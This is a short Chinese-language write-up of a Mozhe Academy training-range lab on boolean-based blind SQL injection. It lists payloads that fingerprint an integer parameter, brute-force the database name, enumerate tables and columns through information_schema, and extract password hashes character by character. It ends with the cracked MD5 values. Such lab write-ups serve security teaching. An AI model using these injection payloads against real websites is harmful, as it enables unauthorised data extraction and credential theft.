布尔型盲注 - 《墨者学院_SQL注入》

利用?id=1 and 1=1 --+ 和 ?id=1 and 1=2 --+判断为整形注入
判断1.PNG 判断2.PNG

因为页面报错没有回显信息，利用语句?id=1 and length(database())=**1** --+到bp爆破获取数据库的长度为10 （红色字体是变量）
数据库长度1.PNG 数据库长度2.PNG

利用语句?id=1 and substr(database(),**1**,1)='**a**' --+爆破获取数据库名字为 stormgroup
数据库名66.PNG

利用语句?id=1 and (select count(*) from information_schema.tables where table_schema="stormgroup") = **1** --+ 获取表数量为 2
表数量为2.PNG

利用语句 ?id=1 and substr((select table_name from information_schema.tables where table_schema='stormgroup' limit **0**,1),**1**,1)='**a**' --+获取数据库表名member,notice
数据库名字11111.PNG
利用语句?id=1 and (select count(*) from information_schema.columns where table_name="**member**")=**1** --+ 爆member表的字段数为3
表的字段数.PNG
利用语句?id=1 and length((select column_name from information_schema.columns where table_name="**member**" limit **0**,1))=**1** --+获取字段名字的长度
member字段长度.PNG
利用语句?id=1 and ascii(substr((select column_name from information_schema.columns where table_name="**member**" limit 0,1), **1**,1))=**1** --+获取字段名
字段name.PNG

利用语句 ?id=1 and ascii(substr((select **name** from stormgroup.member limit **0**,1), **1**, 1))=**1** --+爆字段
墨者.PNG 密码.PNG

利用python转换ascii

得到password：

3114b433dece9180717f2b7de56b28a3
3a95e61213fc11de6e3106900d9003c4

MD5解码得到：

528469
523705

登录拿到key：